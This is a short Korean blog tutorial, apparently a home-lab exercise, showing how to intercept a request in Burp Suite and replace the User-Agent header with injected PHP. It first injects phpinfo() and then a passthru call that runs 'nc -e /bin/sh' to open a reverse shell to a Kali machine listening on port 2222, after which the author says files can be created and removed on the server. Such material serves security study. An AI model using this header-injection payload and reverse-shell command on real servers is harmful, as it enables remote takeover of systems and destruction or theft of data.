안녕하세요 보람줄입니다


proxy를 사용하여 서버에 보내주는 요청을 가로채서 코드(데이터)를 수정해보겠습니다


이전 글

https://leah.kr/83



burpsuite 실행



동의






Proxy -> Options


본인의 아이피인 루프백주소와 포트8080을 사용한다는 것 확인



Firefox 실행



설정






루프백주소와 포트번호 입력



Proxy -> Intercept


활성화가 되어있는지 확인 



url 재입력


prxoy를 활성화를 한 뒤 주소창을 재입력



Proxy -> Intercept -> Headers


헤더에 들어간 후 User-Agent 의 값을 <?php phpinfo() ?>로 변경해줍니다



Forward




쿠키/캐시 삭제


만약 아무런 변화가 없다면 데이터를 삭제해줍니다



접속 후 모습


웹서버의 모든 정보들을 확인할 수 있습니다



allow_url_include


allow_url_include가 만약 on으로 되어 있다면 url을 통해 파일을 업로드 할 수 있습니다




passthru() 함수를 이용하여 외부에서 원격으로 프로그램을 수정해보겠습니다


kali

netcat -h


줄여서 nc -h 라고 입력해도 됩니다


옵션을 볼 수 있어 모르는경우 -h 옵션을 주어 확인해줍니다


-l  : 포트를 열어주겠다는 뜻

-p : 사용할 포트번호


netstat -ant | grep 2222


터미널을 하나 더 열어 포트가 잘 열려있는지 확인해줍니다




다시한번 주소입력



<?php passthru("nc -e /bin/sh 192.168.1.120 2222") ?> 


칼리 자신의 아이피를 적은 후 아까 열어둔 포트를 적어줍니다



Forward 하신후 off 해주셔도 됩니다



접속완료


접속이 되신다면 파일 생성 및 제거 확인 전부 가능합니다

블로그 이미지

보람줄

it관련 포스팅이긴 하지만 미흡한 부분이 많으므로 이해해주시고 피드백 부탁드립니다~